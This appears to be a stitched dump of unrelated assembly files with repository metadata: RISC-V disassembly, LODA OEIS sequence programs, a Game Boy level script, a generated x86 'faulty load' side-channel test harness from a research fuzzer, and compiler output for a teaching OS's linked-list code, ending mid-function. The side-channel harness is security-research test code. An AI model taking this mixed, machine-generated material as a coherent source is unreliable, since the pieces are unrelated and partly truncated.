80002b24: 00168693 addi a3,a3,1
80002b28: 0ff00713 li a4,255
80002b2c: 06e68a63 beq a3,a4,80002ba0 <__truncdfsf2+0x190>
80002b30: fc000737 lui a4,0xfc000
80002b34: fff70713 addi a4,a4,-1 # fbffffff <_stack_start+0x7bff9b2f>
80002b38: 00e7f7b3 and a5,a5,a4
80002b3c: 0ff00713 li a4,255
80002b40: 0037d793 srli a5,a5,0x3
80002b44: 00e69863 bne a3,a4,80002b54 <__truncdfsf2+0x144>
80002b48: 00078663 beqz a5,80002b54 <__truncdfsf2+0x144>
80002b4c: 004007b7 lui a5,0x400
80002b50: 00000593 li a1,0
80002b54: 00800537 lui a0,0x800
80002b58: fff50513 addi a0,a0,-1 # 7fffff <_stack_size+0x7ffbff>
80002b5c: 00a7f7b3 and a5,a5,a0
80002b60: 80800537 lui a0,0x80800
80002b64: fff50513 addi a0,a0,-1 # 807fffff <_stack_start+0x7f9b2f>
80002b68: 0ff6f693 andi a3,a3,255
80002b6c: 01769693 slli a3,a3,0x17
80002b70: 00a7f7b3 and a5,a5,a0
80002b74: 01f59593 slli a1,a1,0x1f
80002b78: 00d7e7b3 or a5,a5,a3
80002b7c: 00b7e533 or a0,a5,a1
80002b80: 00008067 ret
80002b84: 00100793 li a5,1
80002b88: 00000693 li a3,0
80002b8c: 00f7f713 andi a4,a5,15
80002b90: 00400613 li a2,4
80002b94: f8c704e3 beq a4,a2,80002b1c <__truncdfsf2+0x10c>
80002b98: 00478793 addi a5,a5,4 # 400004 <_stack_size+0x3ffc04>
80002b9c: f81ff06f j 80002b1c <__truncdfsf2+0x10c>
80002ba0: 00000793 li a5,0
80002ba4: f99ff06f j 80002b3c <__truncdfsf2+0x12c>
80002ba8 <__mulsi3>:
80002ba8: 00050613 mv a2,a0
80002bac: 00000513 li a0,0
80002bb0: 0015f693 andi a3,a1,1
80002bb4: 00068463 beqz a3,80002bbc <__mulsi3+0x14>
80002bb8: 00c50533 add a0,a0,a2
80002bbc: 0015d593 srli a1,a1,0x1
80002bc0: 00161613 slli a2,a2,0x1
80002bc4: fe0596e3 bnez a1,80002bb0 <__mulsi3+0x8>
80002bc8: 00008067 ret
80002bcc <__divsi3>:
80002bcc: 06054063 bltz a0,80002c2c <__umodsi3+0x10>
80002bd0: 0605c663 bltz a1,80002c3c <__umodsi3+0x20>
80002bd4 <__udivsi3>:
80002bd4: 00058613 mv a2,a1
80002bd8: 00050593 mv a1,a0
80002bdc: fff00513 li a0,-1
80002be0: 02060c63 beqz a2,80002c18 <__udivsi3+0x44>
80002be4: 00100693 li a3,1
80002be8: 00b67a63 bleu a1,a2,80002bfc <__udivsi3+0x28>
80002bec: 00c05863 blez a2,80002bfc <__udivsi3+0x28>
80002bf0: 00161613 slli a2,a2,0x1
80002bf4: 00169693 slli a3,a3,0x1
80002bf8: feb66ae3 bltu a2,a1,80002bec <__udivsi3+0x18>
80002bfc: 00000513 li a0,0
80002c00: 00c5e663 bltu a1,a2,80002c0c <__udivsi3+0x38>
80002c04: 40c585b3 sub a1,a1,a2
80002c08: 00d56533 or a0,a0,a3
80002c0c: 0016d693 srli a3,a3,0x1
80002c10: 00165613 srli a2,a2,0x1
80002c14: fe0696e3 bnez a3,80002c00 <__udivsi3+0x2c>
80002c18: 00008067 ret
80002c1c <__umodsi3>:
80002c1c: 00008293 mv t0,ra
80002c20: fb5ff0ef jal ra,80002bd4 <__udivsi3>
80002c24: 00058513 mv a0,a1
80002c28: 00028067 jr t0
80002c2c: 40a00533 neg a0,a0
80002c30: 0005d863 bgez a1,80002c40 <__umodsi3+0x24>
80002c34: 40b005b3 neg a1,a1
80002c38: f9dff06f j 80002bd4 <__udivsi3>
80002c3c: 40b005b3 neg a1,a1
80002c40: 00008293 mv t0,ra
80002c44: f91ff0ef jal ra,80002bd4 <__udivsi3>
80002c48: 40a00533 neg a0,a0
80002c4c: 00028067 jr t0
80002c50 <__modsi3>:
80002c50: 00008293 mv t0,ra
80002c54: 0005ca63 bltz a1,80002c68 <__modsi3+0x18>
80002c58: 00054c63 bltz a0,80002c70 <__modsi3+0x20>
80002c5c: f79ff0ef jal ra,80002bd4 <__udivsi3>
80002c60: 00058513 mv a0,a1
80002c64: 00028067 jr t0
80002c68: 40b005b3 neg a1,a1
80002c6c: fe0558e3 bgez a0,80002c5c <__modsi3+0xc>
80002c70: 40a00533 neg a0,a0
80002c74: f61ff0ef jal ra,80002bd4 <__udivsi3>
80002c78: 40b00533 neg a0,a1
80002c7c: 00028067 jr t0
80002c80 <__clzsi2>:
80002c80: 000107b7 lui a5,0x10
80002c84: 02f57a63 bleu a5,a0,80002cb8 <__clzsi2+0x38>
80002c88: 0ff00793 li a5,255
80002c8c: 00a7b7b3 sltu a5,a5,a0
80002c90: 00379793 slli a5,a5,0x3
80002c94: 02000713 li a4,32
80002c98: 40f70733 sub a4,a4,a5
80002c9c: 00f557b3 srl a5,a0,a5
80002ca0: 00000517 auipc a0,0x0
80002ca4: 6fc50513 addi a0,a0,1788 # 8000339c <__clz_tab>
80002ca8: 00f507b3 add a5,a0,a5
80002cac: 0007c503 lbu a0,0(a5) # 10000 <_stack_size+0xfc00>
80002cb0: 40a70533 sub a0,a4,a0
80002cb4: 00008067 ret
80002cb8: 01000737 lui a4,0x1000
80002cbc: 01000793 li a5,16
80002cc0: fce56ae3 bltu a0,a4,80002c94 <__clzsi2+0x14>
80002cc4: 01800793 li a5,24
80002cc8: fcdff06f j 80002c94 <__clzsi2+0x14>
Disassembly of section .text.startup:
80002ccc <main>:
int main() {
80002ccc: 1141 addi sp,sp,-16
80002cce: c606 sw ra,12(sp)
main2();
80002cd0: d4cfd0ef jal ra,8000021c <main2>
}
80002cd4: 40b2 lw ra,12(sp)
TEST_COM_BASE[8] = 0;
80002cd6: f01007b7 lui a5,0xf0100
80002cda: f207a023 sw zero,-224(a5) # f00fff20 <_stack_start+0x700f9a50>
}
80002cde: 4501 li a0,0
80002ce0: 0141 addi sp,sp,16
80002ce2: 8082 ret
| 43.357832 | 82 | 0.599306 |
a1472c2266a71a7fb628d6e1876e2d480215aadd | 412 | asm | Assembly | programs/oeis/162/A162609.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/162/A162609.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/162/A162609.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A162609: Triangle read by rows in which row n lists n terms, starting with 1, with gaps = n-2 between successive terms.
; 1,1,1,1,2,3,1,3,5,7,1,4,7,10,13,1,5,9,13,17,21,1,6,11,16,21,26,31,1,7,13,19,25,31,37,43,1,8,15,22,29,36,43,50,57,1,9,17,25,33,41,49,57,65,73,1,10,19,28,37,46,55,64,73,82,91,1,11,21,31,41,51,61,71,81
lpb $0
sub $0,1
mov $1,$0
mul $1,$2
add $2,1
trn $0,$2
lpe
add $1,1
mov $0,$1
| 31.692308 | 200 | 0.626214 |
c988fa7dfd8618b89bf11212fadaf417dbfce069 | 415 | asm | Assembly | oeis/321/A321663.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/321/A321663.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/321/A321663.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A321663: a(n) = prime(n)^prime(n+2).
; Submitted by Christian Krause
; 32,2187,48828125,96889010407,505447028499293771,1461920290375446110677,19967568900859523802559065713,12129821994589221844500501021364910179,1635170022196481349560959748587682926364327,1284475787728524720826927656893473276744000042113841709
mov $2,$0
add $0,2
seq $0,40 ; The prime numbers.
seq $2,40 ; The prime numbers.
pow $2,$0
mov $0,$2
| 37.727273 | 241 | 0.819277 |
879a1cd6cceb3832e099cde332f2b4f77677c0b4 | 2,573 | asm | Assembly | Source/Levels/L0901.asm | AbePralle/FGB | 52f004b8d9d4091a2a242a012dc8c1f90d4c160d | [
"MIT"
] | null | null | null | Source/Levels/L0901.asm | AbePralle/FGB | 52f004b8d9d4091a2a242a012dc8c1f90d4c160d | [
"MIT"
] | null | null | null | Source/Levels/L0901.asm | AbePralle/FGB | 52f004b8d9d4091a2a242a012dc8c1f90d4c160d | [
"MIT"
] | null | null | null | ; L0901.asm
; Generated 01.03.1980 by mlevel
; Modified 01.03.1980 by Abe Pralle
INCLUDE "Source/Defs.inc"
INCLUDE "Source/Levels.inc"
HFENCE_INDEX EQU 35
VFENCE_INDEX EQU 39
VAR_HFENCE EQU 0
VAR_VFENCE EQU 1
;---------------------------------------------------------------------
SECTION "Level0901Section",ROMX
;---------------------------------------------------------------------
L0901_Contents::
DW L0901_Load
DW L0901_Init
DW L0901_Check
DW L0901_Map
;---------------------------------------------------------------------
; Load
;---------------------------------------------------------------------
L0901_Load:
DW ((L0901_LoadFinished - L0901_Load2)) ;size
L0901_Load2:
call ParseMap
ret
L0901_LoadFinished:
;---------------------------------------------------------------------
; Map
;---------------------------------------------------------------------
L0901_Map:
INCBIN "Data/Levels/L0901_slavecamp.lvl"
;---------------------------------------------------------------------
; Init
;---------------------------------------------------------------------
L0901_Init:
DW ((L0901_InitFinished - L0901_Init2)) ;size
L0901_Init2:
ld a,[bgTileMap+HFENCE_INDEX]
ld [levelVars + VAR_HFENCE],a
ld a,[bgTileMap+VFENCE_INDEX]
ld [levelVars + VAR_VFENCE],a
ret
L0901_InitFinished:
;---------------------------------------------------------------------
; Check
;---------------------------------------------------------------------
L0901_Check:
DW ((L0901_CheckFinished - L0901_Check2)) ;size
L0901_Check2:
call ((.animateFence-L0901_Check2)+levelCheckRAM)
ret
.animateFence
ldio a,[updateTimer]
rrca
and 3
ld b,a
ld hl,bgTileMap+HFENCE_INDEX
ld a,[levelVars+VAR_HFENCE]
ld d,a
call ((.animateFourFrames-L0901_Check2)+levelCheckRAM)
ld a,[levelVars+VAR_VFENCE]
ld d,a
jp ((.animateFourFrames-L0901_Check2)+levelCheckRAM)
.animateFourFrames
ld c,4
.animateFourFrames_loop
ld a,b
add c
and 3
add d
ld [hl+],a
dec c
jr nz,.animateFourFrames_loop
ret
L0901_CheckFinished:
PRINT "0901 Script Sizes (Load/Init/Check) (of $500): "
PRINT (L0901_LoadFinished - L0901_Load2)
PRINT " / "
PRINT (L0901_InitFinished - L0901_Init2)
PRINT " / "
PRINT (L0901_CheckFinished - L0901_Check2)
PRINT "\n"
| 26.802083 | 70 | 0.448892 |
f999dc75151352cb2cc590688ce5111ba4eae170 | 5,174 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_1260.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_1260.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_1260.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r14
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_D_ht+0x1d33a, %rax
inc %r13
vmovups (%rax), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $1, %xmm2, %rsi
nop
nop
nop
nop
xor $5477, %rdx
lea addresses_D_ht+0x9b3a, %r14
add %r13, %r13
mov (%r14), %si
nop
cmp $20176, %r13
lea addresses_normal_ht+0x1ea3a, %rsi
lea addresses_UC_ht+0x513a, %rdi
nop
nop
nop
nop
nop
xor %rax, %rax
mov $62, %rcx
rep movsb
nop
nop
nop
nop
sub $32470, %rsi
lea addresses_normal_ht+0xe97a, %r14
nop
add $55995, %rax
vmovups (%r14), %ymm1
vextracti128 $0, %ymm1, %xmm1
vpextrq $1, %xmm1, %rsi
nop
nop
nop
nop
sub %r13, %r13
lea addresses_WC_ht+0x113ba, %r14
nop
nop
nop
nop
xor %r13, %r13
movb (%r14), %al
nop
inc %rsi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r14
pop %r13
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r12
push %rcx
push %rdi
// Faulty Load
lea addresses_A+0x1f83a, %r11
nop
sub $64517, %rdi
vmovups (%r11), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $0, %xmm4, %r10
lea oracles, %rcx
and $0xff, %r10
shlq $12, %r10
mov (%rcx,%r10,1), %r10
pop %rdi
pop %rcx
pop %r12
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_A', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'same': True, 'type': 'addresses_A', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 7}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': True, 'size': 2, 'congruent': 8}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 8, 'type': 'addresses_normal_ht'}, 'dst': {'same': False, 'congruent': 6, 'type': 'addresses_UC_ht'}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_normal_ht', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 5}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_WC_ht', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 7}}
{'35': 21829}
35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
*/
| 47.036364 | 2,999 | 0.660224 |
c6e76e88b9b4502706ea33f355472b1184d5c64c | 383 | asm | Assembly | programs/oeis/176/A176849.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/176/A176849.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/176/A176849.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A176849: Triangle read by rows which contains the (6n)-th row of the Pascal triangle in row n.
; 1,1,6,15,20,15,6,1,1,12,66,220,495,792,924,792,495,220,66,12,1,1,18,153,816,3060,8568,18564,31824,43758,48620,43758,31824,18564,8568,3060,816,153,18,1,1,24,276,2024,10626,42504,134596,346104,735471,1307504
lpb $0
sub $0,1
add $1,6
mov $2,$0
trn $0,$1
lpe
bin $1,$2
mov $0,$1
| 31.916667 | 207 | 0.694517 |
f9dcb7d7064a8f0eea5a6554c5a9731100e30047 | 26,836 | asm | Assembly | PRACT0/SO1HPUB/asm/c2c.asm | so1h/SO1H | 7163aa1907b7f7ab70ab022012036c4fa0482e17 | [
"BSD-2-Clause"
] | null | null | null | PRACT0/SO1HPUB/asm/c2c.asm | so1h/SO1H | 7163aa1907b7f7ab70ab022012036c4fa0482e17 | [
"BSD-2-Clause"
] | null | null | null | PRACT0/SO1HPUB/asm/c2c.asm | so1h/SO1H | 7163aa1907b7f7ab70ab022012036c4fa0482e17 | [
"BSD-2-Clause"
] | null | null | null | bits 16
; glb intptr_t : int
; glb uintptr_t : unsigned
; glb intmax_t : int
; glb uintmax_t : unsigned
; glb int8_t : signed char
; glb int_least8_t : signed char
; glb int_fast8_t : signed char
; glb uint8_t : unsigned char
; glb uint_least8_t : unsigned char
; glb uint_fast8_t : unsigned char
; glb int16_t : short
; glb int_least16_t : short
; glb int_fast16_t : short
; glb uint16_t : unsigned short
; glb uint_least16_t : unsigned short
; glb uint_fast16_t : unsigned short
; glb int32_t : int
; glb int_least32_t : int
; glb int_fast32_t : int
; glb uint32_t : unsigned
; glb uint_least32_t : unsigned
; glb uint_fast32_t : unsigned
; glb imaxdiv_t : struct <something>
; glb bool_t : int
; glb pointer_t : * unsigned char
; glb funcion_t : * (
; prm <something> : * void
; ) * void
; glb manejador_t : * (void) void
; glb rti_t : * (void) void
; glb isr_t : * (void) void
; glb handler_t : * (void) void
; glb retardarThread_t : * (void) int
; glb ptrTVI_t : * * (void) void
; glb modoSO1_t : int
; glb lh_t : struct <something>
; glb address_t : struct <something>
; glb uPtrAdr_t : union <something>
; glb pid_t : int
; glb tid_t : int
; glb uid_t : int
; glb gid_t : int
; glb pindx_t : int
; glb tindx_t : int
; glb df_t : int
; glb dfs_t : int
; glb rindx_t : int
; glb dobleEnlace_t : struct <something>
; glb c2c_t : struct <something>
; glb posicionC2c : (
; prm i : int
; prm c2c : struct <something>
; ) int
; glb eliminarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
; glb apilarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
; glb encolarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
; glb desencolarC2c : (
; prm c2c : struct <something>
; ) int
; glb inicializarC2c : (
; prm c2c : * struct <something>
; prm e : * struct <something>
; prm cabecera : int
; prm compartida : int
; ) void
; glb posicionC2c : (
; prm i : int
; prm c2c : struct <something>
; ) int
section .text
global _posicionC2c
_posicionC2c:
push ebp
movzx ebp, sp
sub sp, 20
; loc i : (@8): int
; loc c2c : (@12): struct <something>
; {
; loc e : (@-4): * struct <something>
; RPN'ized expression: "e c2c &u e -> *u = "
; Expanded expression: "(@-4) (@24) *(4) =(4) "
; Fused expression: "=(204) *(@-4) *(@24) "
mov eax, [bp+24]
mov [bp-4], eax
; loc cabecera : (@-8): int
; RPN'ized expression: "cabecera c2c &u cabecera -> *u = "
; Expanded expression: "(@-8) (@20) *(4) =(4) "
; Fused expression: "=(204) *(@-8) *(@20) "
mov eax, [bp+20]
mov [bp-8], eax
; loc primero : (@-12): int
; RPN'ized expression: "primero c2c &u primero -> *u = "
; Expanded expression: "(@-12) (@16) *(4) =(4) "
; Fused expression: "=(204) *(@-12) *(@16) "
mov eax, [bp+16]
mov [bp-12], eax
; {
; loc j : (@-16): int
; loc k : (@-20): int
; if
; RPN'ized expression: "i cabecera == "
; Expanded expression: "(@8) *(4) (@-8) *(4) == "
; Fused expression: "== *(@8) *(@-8) IF! "
mov eax, [bp+8]
cmp eax, [bp-8]
jne L3
; return
; RPN'ized expression: "0 "
; Expanded expression: "0 "
; Expression value: 0
; Fused expression: "0 "
mov eax, 0
jmp L1
L3:
; RPN'ized expression: "j primero = "
; Expanded expression: "(@-16) (@-12) *(4) =(4) "
; Fused expression: "=(204) *(@-16) *(@-12) "
mov eax, [bp-12]
mov [bp-16], eax
; RPN'ized expression: "k 1 = "
; Expanded expression: "(@-20) 1 =(4) "
; Fused expression: "=(204) *(@-20) 1 "
mov eax, 1
mov [bp-20], eax
; while
; RPN'ized expression: "j cabecera != j i != && "
; Expanded expression: "(@-16) *(4) (@-8) *(4) != [sh&&->7] (@-16) *(4) (@8) *(4) != &&[7] "
L5:
; Fused expression: "!= *(@-16) *(@-8) [sh&&->7] != *(@-16) *(@8) &&[7] "
mov eax, [bp-16]
cmp eax, [bp-8]
setne al
movzx eax, al
; JumpIfZero
test eax, eax
je L7
mov eax, [bp-16]
cmp eax, [bp+8]
setne al
movzx eax, al
L7:
; JumpIfZero
test eax, eax
je L6
; {
; RPN'ized expression: "j e j + *u &u sig -> *u = "
; Expanded expression: "(@-16) (@-4) *(4) (@-16) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@-16) 12 + *(@-4) ax + ax 0 =(204) *(@-16) *ax "
mov eax, [bp-16]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-16], eax
; RPN'ized expression: "k ++p "
; Expanded expression: "(@-20) ++p(4) "
; Fused expression: "++p(4) *(@-20) "
mov eax, [bp-20]
inc dword [bp-20]
; }
jmp L5
L6:
; if
; RPN'ized expression: "j cabecera != "
; Expanded expression: "(@-16) *(4) (@-8) *(4) != "
; Fused expression: "!= *(@-16) *(@-8) IF! "
mov eax, [bp-16]
cmp eax, [bp-8]
je L8
; return
; RPN'ized expression: "k "
; Expanded expression: "(@-20) *(4) "
; Fused expression: "*(4) (@-20) "
mov eax, [bp-20]
jmp L1
L8:
; return
; RPN'ized expression: "1 -u "
; Expanded expression: "-1 "
; Expression value: -1
; Fused expression: "-1 "
mov eax, -1
jmp L1
; }
; }
L1:
db 0x66
leave
retf
L10:
section .fxnsz noalloc
dd L10 - _posicionC2c
; glb eliminarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
section .text
global _eliminarC2c
_eliminarC2c:
push ebp
movzx ebp, sp
sub sp, 12
; loc i : (@8): int
; loc c2c : (@12): struct <something>
; {
; loc e : (@-4): * struct <something>
; RPN'ized expression: "e c2c &u e -> *u = "
; Expanded expression: "(@-4) (@24) *(4) =(4) "
; Fused expression: "=(204) *(@-4) *(@24) "
mov eax, [bp+24]
mov [bp-4], eax
; {
; loc ant : (@-8): int
; RPN'ized expression: "ant e i + *u &u ant -> *u = "
; Expanded expression: "(@-8) (@-4) *(4) (@8) *(4) 12 * + 4 + *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 4 =(204) *(@-8) *ax "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-8], eax
; loc sig : (@-12): int
; RPN'ized expression: "sig e i + *u &u sig -> *u = "
; Expanded expression: "(@-12) (@-4) *(4) (@8) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 0 =(204) *(@-12) *ax "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-12], eax
; RPN'ized expression: "e ant + *u &u sig -> *u sig = "
; Expanded expression: "(@-4) *(4) (@-8) *(4) 12 * + 0 + (@-12) *(4) =(4) "
; Fused expression: "* *(@-8) 12 + *(@-4) ax + ax 0 =(204) *ax *(@-12) "
mov eax, [bp-8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, [bp-12]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e sig + *u &u ant -> *u ant = "
; Expanded expression: "(@-4) *(4) (@-12) *(4) 12 * + 4 + (@-8) *(4) =(4) "
; Fused expression: "* *(@-12) 12 + *(@-4) ax + ax 4 =(204) *ax *(@-8) "
mov eax, [bp-12]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp-8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; }
; if
; RPN'ized expression: "i c2c &u primero -> *u == "
; Expanded expression: "(@8) *(4) (@16) *(4) == "
; Fused expression: "== *(@8) *(@16) IF! "
mov eax, [bp+8]
cmp eax, [bp+16]
jne L13
; RPN'ized expression: "c2c &u primero -> *u e i + *u &u sig -> *u = "
; Expanded expression: "(@16) (@-4) *(4) (@8) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 0 =(204) *(@16) *ax "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp+16], eax
L13:
; loc <something> : int
; RPN'ized expression: "e i + *u &u sig -> *u 1 -u (something15) = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 0 + -1 =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 0 =(204) *ax -1 "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u ant -> *u 1 -u (something16) = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 4 + -1 =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 4 =(204) *ax -1 "
mov eax, [bp+8]
